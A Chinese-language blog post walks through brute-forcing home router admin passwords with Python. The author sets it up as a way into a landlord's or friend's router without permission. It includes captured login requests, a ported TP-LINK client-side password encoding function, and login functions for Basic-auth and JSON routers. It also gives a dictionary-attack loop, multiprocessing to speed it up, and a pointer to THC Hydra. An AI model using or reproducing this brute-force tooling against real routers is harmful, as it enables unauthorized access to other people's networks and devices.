使用 python 暴力破解路由器管理密码

自从实习以来，我一直苦恼于一个问题：桥接的房东家路由器，但是一直不知道路由器的管理密码。其实这也不算啥，不知道就不知道呗。直到某一天去某童鞋家，但是就是连不上 Wi-Fi，看着挂在墙上的路由器，我就起了邪念…… 插网线，拿 MR12U 桥接。但是啊但是啊…… 咱是不是要进管理里看一下 WPA2-PSK 究竟是什么！

我目前只遇到了两种类型的路由器，咱就先来爽一把。

工欲善其事，必先利其器。那我们自然要有 wireshark，还有 postman 啊，当然了，没有 python 解释器也是不行的，啊对你还得有个路由器ε=ε=ε=┏(゜ロ゜;)┛但是你要是真没有路由器，那就拿 Flask 写一个简单的 REST API 吧，也是可以的（但是这还有什么用呢）。

其实在写这篇文章之前，我是很尴尬的……

推特小剧场

路由器管理页面登录方式

我目前见过两种，还有一种就是像 openwrt 那种…… 暂时没有环境测试，不玩。

传统型

大概是这样，需要你输入用户名密码：

新型

我当然是喜欢传统型的啊，为啥，多了个用户名，猜不中用户名有啥用嘛，哈哈哈哈。

抓包之旅：传统型

所以嘛，什么都不用想，打开 wireshark 抓包，然后追踪 HTTP 流，能得到如下的请求报文：

GET / HTTP/1.1
Host: 192.168.7.1
Connection: keep-alive
Authorization: Basic xxxxx
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3075.92 Safari/537.36 OPR/46.0.2218.234
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
 
DNT: 1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: shellInABox=3:101010

所以咱们大概是懂了，发现这家伙是登录是 get 请求带个 Authorization 的头，内容是 Basic base64 编码的信息，其中 base64 编码的是用户名: 密码，那咱抄起 postman 就开始……

既然用 postman 已经成功登录了，那就没太大问题。

抓包之旅：新型

这个 866N 嘛，首先管理页面右键没有用，开控制台发现是 JS 渲染的，再一看发现不是传统的表单提交的，估计是用的 AJAX 吧。抓包过滤 http 的 post 请求，大概能发现这么奇特的请求：

看这样子是点击确定按钮之后，用 ajax 方式提交了一个 json。咱在报文上右键，追踪流 - HTTP 流，看一下完整的响应：

POST / HTTP/1.1
Host: 192.168.1.1
Connection: keep-alive
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://192.168.1.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.9; rv:56.0) Gecko/20100101 Firefox/56.0
Content-Type: application/json; charset=UTF-8
 
DNT: 1
Referer: http://192.168.1.1/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 
{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Content-Length: 75
Connection: close
Access-Control-Allow-Origin: *
Cache-control: no-cache
{"error_code":0, "stok":"%7EAjzwZP%2E%2EFD%5B0Z%7C46Z4PPP%28LQPu4%28kD%28"}

也就是说是提交了{"method":"do","login":{"password":"0KcgeXhc9TefbwK"}}这样一个 json，很明显那个 0K 什么的就是密码了，用 postman 提交一下试试，咋提交呢？headers 设置成application/json，然后 body 里写 raw，设置 json，不出意外的话，你会得到一个 error code 0

但是吧，0KcgeXhc9TefbwK这究竟是个啥，估计是在浏览器这里用 JS 加密了的密码吧，那咱就看 JS 然后溯源……？

还好已经有人分析过了，并且给出了 C# 版本的代码，咱只要 port 到 Python 就好啦。

一种另类的模拟登录的办法

在正经的用 requests 库之前，我想到了一种另类的模拟登录的办法，比如说上面的这段 JS 我要是没逆向出来，那么就只好这么了，这种方法叫做……selenium

from selenium import webdriver
 
driver = webdriver.Chrome()
driver.get('http://192.168.1.1')
driver.find_element_by_xpath('//*[@id="lgPwd"]').send_keys('123456')
driver.find_element_by_xpath('//*[@id="loginSub"]').click()

当然了你还需要写几行代码判断是否登录成功，咱还可以把 Chrome 换成 PhantomJS，只不过嘛，嘿嘿嘿，这个速度，估计要几秒钟才能尝试一个密码，效率太低啦。

传统路由器用 Python 模拟登录

既然我们已经用 postman 搞成功了，那么就上 requests 库试试吧。代码很简单，就几行，简单的测试下：

import requests
r=requests.get('http://192.168.7.1', headers={'Authorization': 'Basic QxxxxI2'})
print r.status_code

如果status_code为 200 的话，那么就是登录成功了。

新型路由器用 Python 模拟登录

不要害怕，我已经帮你逆向好了客户端加密的那段代码，所以总体来说大概就是这么两个函数（好吧感觉缩进乱了）：当然啦，能够把 JavaScript 代码移植到 Python 也很不容易的，这是没有混淆、比较简单易懂的那种的，要是复杂的话，直接用 PyExecJS 吧（可惜停止维护了）

def security_encode(b):
    a = 'RDpbLfCPsJZ7fiv'
    c = 'yLwVl0zKqws7LgKPRQ84Mdt708T1qQ3Ha7xv3H7NyU84p21BriUWBU43odz3iP4rBL3cD02KZciXTysVXiV8ngg6vL48rPJyAUw0HurW20xqxv9aYb4M9wK1Ae0wlro510qXeU07kV57fQMc8L6aLgMLwygtc0F10a0Dg70TOoouyFhdysuRMO51yY5ZlOZZLEal1h0t9YQW0Ko7oBwmCAHoic4HYbUyVeU3sfQ1xtXcPcf1aT303wAQhv66qzW'
 
    e = ''
    g = len(a)
    h = len(b)
    k = len(c)
 
    f = g if g > h else h
    for p in range(f):
        n = l = 187
        if p >= g:
            n = ord(b[p])
        elif p >= h:
            l = ord(a[p])
        else:
            l = ord(a[p])
            n = ord(b[p])
        e += c[((l ^ n) % k)]
    return e
 
 
def login(password):
    requests.get('http://192.168.1.1', headers={'Content-Type': 'application/json'})
    r = requests.post('http://192.168.1.1', json={"method": "do", "login": {"password": security_encode(password)}})
    return r.status_code

同上，status_code为 200，就意味着密码正确啦。

开始暴力破解：集成弱口令字典

当然了，实际暴力破解的时候，咱不可能一个一个输入密码，所以咱要使用弱口令字典。为了演示方便，我就随意编辑了一个比较简单的、长度比较短的弱口令字典，咱封装一下就好啦。想要真正的弱口令字典吗？自己搜索去吧~

def new_crack():
    with open('test_pass.txt', 'r') as f:
        while True:
            line = f.readline()
            if len(line) == 0:
                break
            else:
                result, msg = new_login(line.rstrip('\n'))
                if result:
                    return msg
 

至于传统登录的，还需要一份用户名文件，双重循环并注意 seek 即可。

封装，封装

在完成了基本的测试之后，基本上就剩下封装函数、引入库、进行测试这些基本操作了，详细的代码就不贴了，可以戳下面的章鱼猫获取。其实这代码还可以更灵活的，那么就交给读者们了！
项目地址

加快破解速度

俗话说，欲速则不达，呸，我才不管这些呢。我要加快破解程序的破解速度，我这一跑，也就占用 20% 不到的 CPU，速度太慢了。那么…… 多线程？呃，Python 里的多线程由于 GIL 锁的存在，这多线程有时接近个摆设（就是说，无法发挥多核 CPU 的全部性能，当然如果不是 CPU 密集型的任务，遇到 I/O 操作会释放锁，用多线程还是可以并发的）…… 那么我们只能上多进程了… 省事，跑满 CPU… 另外，评论区仙子指出，连接复用也是一个好办法。

那我们只需要在密码那里开个进程池，把任务全都丢给进程池，然后一起join就可以了。详细的代码可以参考下面的章鱼猫。
多进程示例地址

当然了，为了防止反复调用p.get()影响多进程效率，我稍微做了一点点改动。

这是一颗满载的 CPU……

最后的结果……

我还能说什么，TP-LINK 这绝对是脑子进水了。客户端加密的时候我就说你有毛病了，这连自己都进不去管理页面逼我重启路由器，真是…… 行吧，我打算逆向固件了。下次见。啊对，有个工具叫 THC Hydra，也可以试试哦！

哦对了

提前祝愿小伙伴们元旦快乐！